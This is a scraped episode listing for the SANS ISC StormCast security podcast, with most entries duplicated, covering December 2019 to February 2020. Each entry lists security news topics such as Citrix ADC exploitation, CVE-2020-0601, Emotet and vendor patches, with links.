2/6/20205 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, February 6th 2020

Fake Browser Updates installing NetSupport RAT https://isc.sans.edu/forums/diary/Fake+browser+update+pages+are+still+a+thing/25774/ Google Android Update https://source.android.com/security/bulletin/2020-02-01#Google-Play-system-updates 5 Cisco Vulnerabilities https://www.armis.com/cdpwn/
2/6/20205 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, February 5th 2020

Google Chrome 80 Released https://www.chromium.org/updates/same-site https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop.html File Read Vulnerablity in WhatsApp https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop.html HiSilicon DVR Backdoor https://habr.com/en/post/486856/
2/5/20206 minutes, 16 seconds
Episode Artwork

ISC StormCast for Wednesday, February 5th 2020

Google Chrome 80 Released https://www.chromium.org/updates/same-site https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop.html File Read Vulnerablity in WhatsApp https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop.html HiSilicon DVR Backdoor https://habr.com/en/post/486856/
2/5/20206 minutes, 16 seconds
Episode Artwork

ISC StormCast for Tuesday, February 4th 2020

Triple Encrypted AZORult Installer https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/ New sudo Vulnerability (pwfeedback) https://www.sudo.ws/alerts/pwfeedback.html Teamviewer Password Storage https://whynotsecurity.com/blog/teamviewer/
2/4/20206 minutes, 42 seconds
Episode Artwork

ISC StormCast for Tuesday, February 4th 2020

Triple Encrypted AZORult Installer https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/ New sudo Vulnerability (pwfeedback) https://www.sudo.ws/alerts/pwfeedback.html Teamviewer Password Storage https://whynotsecurity.com/blog/teamviewer/
2/4/20206 minutes, 42 seconds
Episode Artwork

ISC StormCast for Monday, February 3rd 2020

Stego and Cryptominers (with video) https://isc.sans.edu/forums/diary/Video+Stego+Cryptominers/25764/ Corona Virus Phishing / Scams https://blog.knowbe4.com/heads-up-scam-of-the-week-coronavirus-phishing-attacks-in-the-wild?nCOV-2019-bc-index https://twitter.com/briankrebs/status/1223959185764896768 Google Open Sources Security Token Software https://security.googleblog.com/2020/01/say-hello-to-opensk-fully-open-source.html
2/3/20206 minutes, 5 seconds
Episode Artwork

ISC StormCast for Monday, February 3rd 2020

Stego and Cryptominers (with video) https://isc.sans.edu/forums/diary/Video+Stego+Cryptominers/25764/ Corona Virus Phishing / Scams https://blog.knowbe4.com/heads-up-scam-of-the-week-coronavirus-phishing-attacks-in-the-wild?nCOV-2019-bc-index https://twitter.com/briankrebs/status/1223959185764896768 Google Open Sources Security Token Software https://security.googleblog.com/2020/01/say-hello-to-opensk-fully-open-source.html
2/3/20206 minutes, 5 seconds
Episode Artwork

ISC StormCast for Friday, January 31st 2020

Chrome Same-Site Cookie Change https://www.chromestatus.com/feature/5088147346030592 https://docs.microsoft.com/en-us/office365/troubleshoot/miscellaneous/chrome-behavior-affects-applications https://caniuse.com/#feat=same-site-cookie-attribute Avast Apology https://blog.avast.com/a-message-from-ceo-ondrej-vlcek Magento Update https://helpx.adobe.com/security/products/magento/apsb20-02.html
1/31/202010 minutes, 23 seconds
Episode Artwork

ISC StormCast for Friday, January 31st 2020

Chrome Same-Site Cookie Change https://www.chromestatus.com/feature/5088147346030592 https://docs.microsoft.com/en-us/office365/troubleshoot/miscellaneous/chrome-behavior-affects-applications https://caniuse.com/#feat=same-site-cookie-attribute Avast Apology https://blog.avast.com/a-message-from-ceo-ondrej-vlcek Magento Update https://helpx.adobe.com/security/products/magento/apsb20-02.html
1/31/202010 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, January 30th 2020

Malware Using Text from Impeachment News Coverage https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/ Coronavirus Themed Malware Targets Japan with Emotet https://twitter.com/Cryptolaemus1/status/1222388971428294656 https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b abuse.ch Offers new "I got phished" service https://igotphished.abuse.ch/ OpenSMTPD RCE Vulnerability https://www.openwall.com/lists/oss-security/2020/01/28/3
1/30/20206 minutes, 34 seconds
Episode Artwork

ISC StormCast for Thursday, January 30th 2020

Malware Using Text from Impeachment News Coverage https://www.bleepingcomputer.com/news/security/malware-tries-to-trump-security-software-with-potus-impeachment/ Coronavirus Themed Malware Targets Japan with Emotet https://twitter.com/Cryptolaemus1/status/1222388971428294656 https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b abuse.ch Offers new "I got phished" service https://igotphished.abuse.ch/ OpenSMTPD RCE Vulnerability https://www.openwall.com/lists/oss-security/2020/01/28/3
1/30/20206 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, January 29th 2020

Recent Emotet Infection installs Trickbot https://isc.sans.edu/forums/diary/Emotet+epoch+1+infection+with+Trickbot+gtag+mor84/25752/ Apple Updates https://support.apple.com/en-us/HT201222 Zoom Fixes Video Conferencing Brute Forcing Vulnerability https://www.theregister.co.uk/2020/01/28/zoom_eavesdrop_hack/ Intel Fixes Yet Another Information Leakage Flaw https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00329.html https://cacheoutattack.com/ Avast Anti Virus Selling User's Browsing Data https://www.vice.com/en_us/article/qjdkq7/avast-antivirus-sells-user-browsing-data-investigation
1/29/20205 minutes, 27 seconds
Episode Artwork

ISC StormCast for Wednesday, January 29th 2020

Recent Emotet Infection installs Trickbot https://isc.sans.edu/forums/diary/Emotet+epoch+1+infection+with+Trickbot+gtag+mor84/25752/ Apple Updates https://support.apple.com/en-us/HT201222 Zoom Fixes Video Conferencing Brute Forcing Vulnerability https://www.theregister.co.uk/2020/01/28/zoom_eavesdrop_hack/ Intel Fixes Yet Another Information Leakage Flaw https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00329.html https://cacheoutattack.com/ Avast Anti Virus Selling User's Browsing Data https://www.vice.com/en_us/article/qjdkq7/avast-antivirus-sells-user-browsing-data-investigation
1/29/20205 minutes, 27 seconds
Episode Artwork

ISC StormCast for Tuesday, January 28th 2020

Coronavirus Preparedness and Associated Scams https://isc.sans.edu/forums/diary/Network+Security+Perspective+on+Coronavirus+Preparedness/25750/ RD Gateway RCE Exploit Demoed https://twitter.com/layle_ctf/status/1221514332049113095?s=12 Mitsubishi Electric Compromised via Trend Micro Vulnerability http://www.mitsubishielectric.co.jp/news/2020/0120-b.pdf https://www.zdnet.com/article/trend-micro-antivirus-zero-day-used-in-mitsubishi-electric-hack/
1/28/20204 minutes, 32 seconds
Episode Artwork

ISC StormCast for Tuesday, January 28th 2020

Coronavirus Preparedness and Associated Scams https://isc.sans.edu/forums/diary/Network+Security+Perspective+on+Coronavirus+Preparedness/25750/ RD Gateway RCE Exploit Demoed https://twitter.com/layle_ctf/status/1221514332049113095?s=12 Mitsubishi Electric Compromised via Trend Micro Vulnerability http://www.mitsubishielectric.co.jp/news/2020/0120-b.pdf https://www.zdnet.com/article/trend-micro-antivirus-zero-day-used-in-mitsubishi-electric-hack/
1/28/20204 minutes, 32 seconds
Episode Artwork

ISC StormCast for Monday, January 27th 2020

Citrix Releases ADC Updates For All Versions https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/ Temporary Windows 0-Day Fix Breaks Printers https://www.reddit.com/r/sysadmin/comments/etumy7/microsoft_ie_zeroday_fix_breaks_hp_printing/ Critical Vulnerabilitiesin GE Medical Devices https://www.us-cert.gov/ics/advisories/icsma-20-023-01
1/27/20205 minutes, 50 seconds
Episode Artwork

ISC StormCast for Monday, January 27th 2020

Citrix Releases ADC Updates For All Versions https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/ Temporary Windows 0-Day Fix Breaks Printers https://www.reddit.com/r/sysadmin/comments/etumy7/microsoft_ie_zeroday_fix_breaks_hp_printing/ Critical Vulnerabilitiesin GE Medical Devices https://www.us-cert.gov/ics/advisories/icsma-20-023-01
1/27/20205 minutes, 50 seconds
Episode Artwork

ISC StormCast for Friday, January 24th 2020

Simple vs. Complex Obfuscation https://isc.sans.edu/forums/diary/Complex+Obfuscation+VS+Simple+Trick/25738/ RD Gateway PoC Exploit Release https://github.com/ollypwn/BlueGate Citrix ADC Compromise Scanner https://github.com/citrix/ioc-scanner-CVE-2019-19781/ LastPass Accidentially Removes Extension from Chrome Web Store https://twitter.com/LastPassStatus/status/1220122561989640192
1/24/20207 minutes, 6 seconds
Episode Artwork

ISC StormCast for Friday, January 24th 2020

Simple vs. Complex Obfuscation https://isc.sans.edu/forums/diary/Complex+Obfuscation+VS+Simple+Trick/25738/ RD Gateway PoC Exploit Release https://github.com/ollypwn/BlueGate Citrix ADC Compromise Scanner https://github.com/citrix/ioc-scanner-CVE-2019-19781/ LastPass Accidentially Removes Extension from Chrome Web Store https://twitter.com/LastPassStatus/status/1220122561989640192
1/24/20207 minutes, 6 seconds
Episode Artwork

ISC StormCast for Thursday, January 23rd 2020

German Malspam Pushing Ursnif https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/ Tracking Users Using Safari's Intelligent Tracking Prevention https://arxiv.org/pdf/2001.07421.pdf Muhstik Botnet Targeting Tomato Routers https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/ Cisco Firepower Management Center LDAP Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200122-fmc-auth
1/23/20205 minutes, 55 seconds
Episode Artwork

ISC StormCast for Thursday, January 23rd 2020

German Malspam Pushing Ursnif https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/ Tracking Users Using Safari's Intelligent Tracking Prevention https://arxiv.org/pdf/2001.07421.pdf Muhstik Botnet Targeting Tomato Routers https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/ Cisco Firepower Management Center LDAP Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200122-fmc-auth
1/23/20205 minutes, 55 seconds
Episode Artwork

ISC StormCast for Wednesday, January 22nd 2020

DeepBlueCLI https://isc.sans.edu/forums/diary/DeepBlueCLI+Powershell+Threat+Hunting/25730/ https://github.com/sans-blue-team/DeepBlueCLI EFS Ransomware https://safebreach.com/Post/EFS-Ransomware Fake Leak Compensation https://www.kaspersky.com/blog/data-leak-compensation-scam/32057/ Criminals Use Fake Job Sites to Defraud Victims https://www.ic3.gov/media/2020/200121.aspx
1/22/20206 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, January 22nd 2020

DeepBlueCLI https://isc.sans.edu/forums/diary/DeepBlueCLI+Powershell+Threat+Hunting/25730/ https://github.com/sans-blue-team/DeepBlueCLI EFS Ransomware https://safebreach.com/Post/EFS-Ransomware Fake Leak Compensation https://www.kaspersky.com/blog/data-leak-compensation-scam/32057/ Criminals Use Fake Job Sites to Defraud Victims https://www.ic3.gov/media/2020/200121.aspx
1/22/20206 minutes, 6 seconds
Episode Artwork

ISC StormCast for Tuesday, January 21st 2020

Twist on Sextortion https://www.dailymail.co.uk/sciencetech/article-7886055/Sextortion-campaign-targets-users-Google-Nest-smart-camera.html Emotet Uses Extortion to Infect Systems https://www.bleepingcomputer.com/news/security/emotet-malware-dabbles-in-extortion-with-new-spam-template/ Lastpass Outage https://www.theregister.co.uk/2020/01/20/lastpass_outage/ Netgear Signed TLS Cert Private Key Disclosure https://gist.github.com/nstarke/a611a19aab433555e91c656fe1f030a9
1/21/20205 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, January 21st 2020

Twist on Sextortion https://www.dailymail.co.uk/sciencetech/article-7886055/Sextortion-campaign-targets-users-Google-Nest-smart-camera.html Emotet Uses Extortion to Infect Systems https://www.bleepingcomputer.com/news/security/emotet-malware-dabbles-in-extortion-with-new-spam-template/ Lastpass Outage https://www.theregister.co.uk/2020/01/20/lastpass_outage/ Netgear Signed TLS Cert Private Key Disclosure https://gist.github.com/nstarke/a611a19aab433555e91c656fe1f030a9
1/21/20205 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, January 20th 2020

Microsoft Scripting Engine Memory Corruption Vulnerability https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001 CVE-2020-0601 Update https://isc.sans.edu/forums/diary/Summing+up+CVE20200601+or+the+Lets+Decrypt+vulnerability/25720/ Curveball Update https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/ https://isc.sans.edu/diary//25724
1/20/20205 minutes, 30 seconds
Episode Artwork

ISC StormCast for Monday, January 20th 2020

Microsoft Scripting Engine Memory Corruption Vulnerability https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200001 CVE-2020-0601 Update https://isc.sans.edu/forums/diary/Summing+up+CVE20200601+or+the+Lets+Decrypt+vulnerability/25720/ Curveball Update https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/ https://isc.sans.edu/diary//25724
1/20/20205 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, January 17th 2020

CVE-2020-0601 Update ("Curveball" , "Letsdecrypt") https://isc.sans.edu/forums/diary/Summing+up+CVE20200601+or+the+Lets+Decrypt+vulnerability/25720/ https://curveballtest.com Certain Netscaler Devices Do Not Support Mitigation (article in dutch) https://www.ncsc.nl/actueel/nieuws/2020/januari/16/door-citrix-geadviseerde-mitigerende-maatregelen-niet-altijd-effectief Cable Haunt Vulnerability https://cablehaunt.com/ STI Student Interview: Jon Michael Lacek https://www.sans.org/reading-room/whitepapers/securecode/changing-devops-culture-security-scan-time-39125
1/17/202014 minutes, 23 seconds
Episode Artwork

ISC StormCast for Friday, January 17th 2020

CVE-2020-0601 Update ("Curveball" , "Letsdecrypt") https://isc.sans.edu/forums/diary/Summing+up+CVE20200601+or+the+Lets+Decrypt+vulnerability/25720/ https://curveballtest.com Certain Netscaler Devices Do Not Support Mitigation (article in dutch) https://www.ncsc.nl/actueel/nieuws/2020/januari/16/door-citrix-geadviseerde-mitigerende-maatregelen-niet-altijd-effectief Cable Haunt Vulnerability https://cablehaunt.com/ STI Student Interview: Jon Michael Lacek https://www.sans.org/reading-room/whitepapers/securecode/changing-devops-culture-security-scan-time-39125
1/17/202014 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, January 16th 2020

CVE-2020-0601 Followup https://isc.sans.edu/forums/diary/CVE20200601+Followup/25714/ Oracle Patches https://www.oracle.com/security-alerts/cpujan2020.html
1/16/20206 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, January 16th 2020

CVE-2020-0601 Followup https://isc.sans.edu/forums/diary/CVE20200601+Followup/25714/ Oracle Patches https://www.oracle.com/security-alerts/cpujan2020.html
1/16/20206 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, January 15th 2020

Microsoft January 2020 Patch Tuesday and #CryptoAPI Flaw Webcast: https://sans.org/cryptoapi-isc Diary: https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+for+January+2020/25710/ NSA Release: https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF
1/15/202010 minutes, 2 seconds
Episode Artwork

ISC StormCast for Wednesday, January 15th 2020

Microsoft January 2020 Patch Tuesday and #CryptoAPI Flaw Webcast: https://sans.org/cryptoapi-isc Diary: https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+for+January+2020/25710/ NSA Release: https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF
1/15/202010 minutes, 2 seconds
Episode Artwork

ISC StormCast for Tuesday, January 14th 2020

Upcoming Critical MSFT Patch https://krebsonsecurity.com/2020/01/cryptic-rumblings-ahead-of-first-2020-patch-tuesday/ SIM Swapping is Easy https://www.issms2fasecure.com/assets/sim_swaps-01-10-2020.pdf Google Open Sources wombat dressing room npm publication proxy https://opensource.googleblog.com/2020/01/wombat-dressing-room-npm-publication_10.html
1/14/20207 minutes, 22 seconds
Episode Artwork

ISC StormCast for Tuesday, January 14th 2020

Upcoming Critical MSFT Patch https://krebsonsecurity.com/2020/01/cryptic-rumblings-ahead-of-first-2020-patch-tuesday/ SIM Swapping is Easy https://www.issms2fasecure.com/assets/sim_swaps-01-10-2020.pdf Google Open Sources wombat dressing room npm publication proxy https://opensource.googleblog.com/2020/01/wombat-dressing-room-npm-publication_10.html
1/14/20207 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, January 13th 2020

Citrix ADC Vulnerability Actively Exploited. Assume vulnerable systems are compromised. Updated Citrix Advisory: https://support.citrix.com/article/CTX267027 Exploit Activity Summary: https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/ Vulnerablity Scanner: https://github.com/trustedsec/cve-2019-19781/ Special Webcast: https://i5c.us/citrix YouTube Walk Through of the vulnerability: https://youtu.be/msslpqyf98c
1/13/20207 minutes, 36 seconds
Episode Artwork

ISC StormCast for Monday, January 13th 2020

Citrix ADC Vulnerability Actively Exploited. Assume vulnerable systems are compromised. Updated Citrix Advisory: https://support.citrix.com/article/CTX267027 Exploit Activity Summary: https://isc.sans.edu/forums/diary/Citrix+ADC+Exploits+are+Public+and+Heavily+Used+Attempts+to+Install+Backdoor/25700/ Vulnerablity Scanner: https://github.com/trustedsec/cve-2019-19781/ Special Webcast: https://i5c.us/citrix YouTube Walk Through of the vulnerability: https://youtu.be/msslpqyf98c
1/13/20207 minutes, 36 seconds
Episode Artwork

ISC StormCast for Friday, January 10th 2020

Another Malicious Word Document https://isc.sans.edu/forums/diary/Quick+Analyzis+of+another+Maldoc/25694/ SHA1 Update https://sha-mbles.github.io/ Cisco Updates https://tools.cisco.com/security/center/publicationListing.x Mandy Galante: Girls Go Cyberstart (register now. Play Jan 13th-31st) https://www.girlsgocyberstart.org/
1/10/202010 minutes, 38 seconds
Episode Artwork

ISC StormCast for Friday, January 10th 2020

Another Malicious Word Document https://isc.sans.edu/forums/diary/Quick+Analyzis+of+another+Maldoc/25694/ SHA1 Update https://sha-mbles.github.io/ Cisco Updates https://tools.cisco.com/security/center/publicationListing.x Mandy Galante: Girls Go Cyberstart (register now. Play Jan 13th-31st) https://www.girlsgocyberstart.org/
1/10/202010 minutes, 38 seconds
Episode Artwork

ISC StormCast for Thursday, January 9th 2020

Critical Firefox Update Fixing Exploited Bug https://www.mozilla.org/en-US/security/advisories/mfsa2020-03/ 3 Google Play Store Apps Exploit Android Zero-Day https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/ Tails 4.2 https://tails.boum.org/news/version_4.2/index.en.html TikTok Vulnerablities https://research.checkpoint.com/2020/tik-or-tok-is-tiktok-secure-enough/
1/9/20205 minutes, 41 seconds
Episode Artwork

ISC StormCast for Thursday, January 9th 2020

Critical Firefox Update Fixing Exploited Bug https://www.mozilla.org/en-US/security/advisories/mfsa2020-03/ 3 Google Play Store Apps Exploit Android Zero-Day https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/ Tails 4.2 https://tails.boum.org/news/version_4.2/index.en.html TikTok Vulnerablities https://research.checkpoint.com/2020/tik-or-tok-is-tiktok-secure-enough/
1/9/20205 minutes, 41 seconds
Episode Artwork

ISC StormCast for Wednesday, January 8th 2020

Citrix ADC Update https://isc.sans.edu/forums/diary/A+Quick+Update+on+Scanning+for+CVE201919781+Citrix+ADC+Gateway+Vulnerability/25686/ Pulse Secure SSLVPN Exploited https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/ https://www.darkreading.com/attacks-breaches/widely-known-flaw-in-pulse-secure-vpn-being-used-in-ransomware-attacks/d/d-id/1336729 Google Project Zero Changing Disclosure Policy https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html Google Updates Android https://source.android.com/security/bulletin/2020-01-01
1/8/20205 minutes, 29 seconds
Episode Artwork

ISC StormCast for Wednesday, January 8th 2020

Citrix ADC Update https://isc.sans.edu/forums/diary/A+Quick+Update+on+Scanning+for+CVE201919781+Citrix+ADC+Gateway+Vulnerability/25686/ Pulse Secure SSLVPN Exploited https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/ https://www.darkreading.com/attacks-breaches/widely-known-flaw-in-pulse-secure-vpn-being-used-in-ransomware-attacks/d/d-id/1336729 Google Project Zero Changing Disclosure Policy https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html Google Updates Android https://source.android.com/security/bulletin/2020-01-01
1/8/20205 minutes, 29 seconds
Episode Artwork

ISC StormCast for Tuesday, January 7th 2020

Spoofed Scans from 103/8 https://isc.sans.edu/forums/diary/Increase+in+Number+of+Sources+January+3rd+and+4th+spoofed/25678/ Iran Terror Threat https://www.dhs.gov/sites/default/files/ntas/alerts/20_0104_ntas_bulletin.pdf BusKill Laptop Kill Cord https://tech.michaelaltfield.net/2020/01/02/buskill-laptop-kill-cord-dead-man-switch/
1/7/20205 minutes, 10 seconds
Episode Artwork

ISC StormCast for Tuesday, January 7th 2020

Spoofed Scans from 103/8 https://isc.sans.edu/forums/diary/Increase+in+Number+of+Sources+January+3rd+and+4th+spoofed/25678/ Iran Terror Threat https://www.dhs.gov/sites/default/files/ntas/alerts/20_0104_ntas_bulletin.pdf BusKill Laptop Kill Cord https://tech.michaelaltfield.net/2020/01/02/buskill-laptop-kill-cord-dead-man-switch/
1/7/20205 minutes, 10 seconds
Episode Artwork

ISC StormCast for Monday, January 6th 2020

Quick Summary of the California Conumser Privacy Act https://isc.sans.edu/forums/diary/CCPA+Quick+Overview/25668/ Cisco Vulnerabilities https://tools.cisco.com/security/center/publicationListing.x XiaoMi Camera Cache Bug https://www.reddit.com/r/googlehome/comments/eine1m/when_i_load_the_xiaomi_camera_in_my_google_home/
1/6/20204 minutes, 31 seconds
Episode Artwork

ISC StormCast for Monday, January 6th 2020

Quick Summary of the California Conumser Privacy Act https://isc.sans.edu/forums/diary/CCPA+Quick+Overview/25668/ Cisco Vulnerabilities https://tools.cisco.com/security/center/publicationListing.x XiaoMi Camera Cache Bug https://www.reddit.com/r/googlehome/comments/eine1m/when_i_load_the_xiaomi_camera_in_my_google_home/
1/6/20204 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, January 3rd 2020

Ransomware written in JavaScript using Node.js https://isc.sans.edu/forums/diary/Ransomware+in+Nodejs/25664/ Landry Restaurant PoS Breach https://www.landrysinc.com/CreditNotice/CANotice.asp Holiday Hack Challenge https://www.holidayhackchallenge.com Citrix/NetScaler Vulnerability Special Webcast Recording https://i5c.us/citrix
1/3/20208 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, January 3rd 2020

Ransomware written in JavaScript using Node.js https://isc.sans.edu/forums/diary/Ransomware+in+Nodejs/25664/ Landry Restaurant PoS Breach https://www.landrysinc.com/CreditNotice/CANotice.asp Holiday Hack Challenge https://www.holidayhackchallenge.com Citrix/NetScaler Vulnerability Special Webcast Recording https://i5c.us/citrix
1/3/20208 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, December 31st 2019

ISC API Update https://isc.sans.edu/api https://isc.sans.edu/forums/diary/Miscellaneous+Updates+to+our+Threatfeed+API/25654/ CCC Conference https://fahrplan.events.ccc.de/congress/2019/Fahrplan/ https://events.ccc.de/congress/2019/wiki/index.php/Main_Page
12/31/20196 minutes, 37 seconds
Episode Artwork

ISC StormCast for Tuesday, December 31st 2019

ISC API Update https://isc.sans.edu/api https://isc.sans.edu/forums/diary/Miscellaneous+Updates+to+our+Threatfeed+API/25654/ CCC Conference https://fahrplan.events.ccc.de/congress/2019/Fahrplan/ https://events.ccc.de/congress/2019/wiki/index.php/Main_Page
12/31/20196 minutes, 37 seconds
Episode Artwork

ISC StormCast for Monday, December 30th 2019

Breaking 2FA Soft Tokens https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf PiHole Dashboard https://isc.sans.edu/forums/diary/ELK+Dashboard+for+Pihole+Logs/25652/ Corrupt Office Documents https://isc.sans.edu/forums/diary/Corrupt+Office+Documents/25650/ Enumerating Office 365 Users https://isc.sans.edu/forums/diary/Enumerating+office365+users/25648/
12/30/20195 minutes, 56 seconds
Episode Artwork

ISC StormCast for Monday, December 30th 2019

Breaking 2FA Soft Tokens https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf PiHole Dashboard https://isc.sans.edu/forums/diary/ELK+Dashboard+for+Pihole+Logs/25652/ Corrupt Office Documents https://isc.sans.edu/forums/diary/Corrupt+Office+Documents/25650/ Enumerating Office 365 Users https://isc.sans.edu/forums/diary/Enumerating+office365+users/25648/
12/30/20195 minutes, 56 seconds
Episode Artwork

ISC StormCast for Friday, December 27th 2019

Citrix Application Delivery Controller (Netscaler ADC) Critical Vulnerability https://www.ptsecurity.com/ww-en/about/news/citrix-vulnerability-allows-criminals-to-hack-networks-of-80000-companies/ https://support.citrix.com/article/CTX267027
12/27/20193 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, December 27th 2019

Citrix Application Delivery Controller (Netscaler ADC) Critical Vulnerability https://www.ptsecurity.com/ww-en/about/news/citrix-vulnerability-allows-criminals-to-hack-networks-of-80000-companies/ https://support.citrix.com/article/CTX267027
12/27/20193 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, December 23rd 2019

Extracting VBA Macros From .DWG Files https://isc.sans.edu/forums/diary/Extracting+VBA+Macros+From+DWG+Files/25634/ Cisco PKI Self-Signed Certificate Expiration https://www.cisco.com/c/en/us/support/docs/field-notices/704/fn70489.html AFRINIC IP Address Space Misappropriated By Insider https://mybroadband.co.za/news/internet/330379-how-internet-resources-worth-r800-million-were-stolen-and-sold-on-the-black-market.html
12/23/20194 minutes, 34 seconds
Episode Artwork

ISC StormCast for Monday, December 23rd 2019

Extracting VBA Macros From .DWG Files https://isc.sans.edu/forums/diary/Extracting+VBA+Macros+From+DWG+Files/25634/ Cisco PKI Self-Signed Certificate Expiration https://www.cisco.com/c/en/us/support/docs/field-notices/704/fn70489.html AFRINIC IP Address Space Misappropriated By Insider https://mybroadband.co.za/news/internet/330379-how-internet-resources-worth-r800-million-were-stolen-and-sold-on-the-black-market.html
12/23/20194 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, December 20th 2019

More DNS over HTTPS Details https://isc.sans.edu/forums/diary/More+DNS+over+HTTPS+Become+One+With+the+Packet+Be+the+Query+See+the+Query/25628/ Ransomware Outing Victims https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/ Google Chrome Update https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop_17.html
12/20/20195 minutes, 12 seconds
Episode Artwork

ISC StormCast for Friday, December 20th 2019

More DNS over HTTPS Details https://isc.sans.edu/forums/diary/More+DNS+over+HTTPS+Become+One+With+the+Packet+Be+the+Query+See+the+Query/25628/ Ransomware Outing Victims https://krebsonsecurity.com/2019/12/ransomware-gangs-now-outing-victim-businesses-that-dont-pay-up/ Google Chrome Update https://chromereleases.googleblog.com/2019/12/stable-channel-update-for-desktop_17.html
12/20/20195 minutes, 12 seconds
Episode Artwork

ISC StormCast for Thursday, December 19th 2019

An Emotet Update https://isc.sans.edu/forums/diary/Emotet+infection+with+spambot+activity/25622/ Emotet Used to Spread Malware From German Federal Agency Accounts (german) https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2019/Spam-Bundesbehoerden_181219.html Joomla Patches SQL Injection https://developer.joomla.org/security-centre.html Unicode Mapping Problems https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/
12/19/20193 minutes, 46 seconds
Episode Artwork

ISC StormCast for Thursday, December 19th 2019

An Emotet Update https://isc.sans.edu/forums/diary/Emotet+infection+with+spambot+activity/25622/ Emotet Used to Spread Malware From German Federal Agency Accounts (german) https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2019/Spam-Bundesbehoerden_181219.html Joomla Patches SQL Injection https://developer.joomla.org/security-centre.html Unicode Mapping Problems https://eng.getwisdom.io/hacking-github-with-unicode-dotless-i/
12/19/20193 minutes, 46 seconds
Episode Artwork

ISC StormCast for Wednesday, December 18th 2019

Discovering DNS over HTTPS https://isc.sans.edu/forums/diary/Is+it+Possible+to+Identify+DNS+over+HTTPs+Without+Decrypting+TLS/25616/ Ring Camera Weaknesses https://www.vice.com/en_us/article/epg4xm/amazon-ring-camera-security WhatsApp DoS Bug https://research.checkpoint.com/2019/breakingapp-whatsapp-crash-data-loss-bug/
12/18/20196 minutes
Episode Artwork

ISC StormCast for Wednesday, December 18th 2019

Discovering DNS over HTTPS https://isc.sans.edu/forums/diary/Is+it+Possible+to+Identify+DNS+over+HTTPs+Without+Decrypting+TLS/25616/ Ring Camera Weaknesses https://www.vice.com/en_us/article/epg4xm/amazon-ring-camera-security WhatsApp DoS Bug https://research.checkpoint.com/2019/breakingapp-whatsapp-crash-data-loss-bug/
12/18/20196 minutes
Episode Artwork

ISC StormCast for Tuesday, December 17th 2019

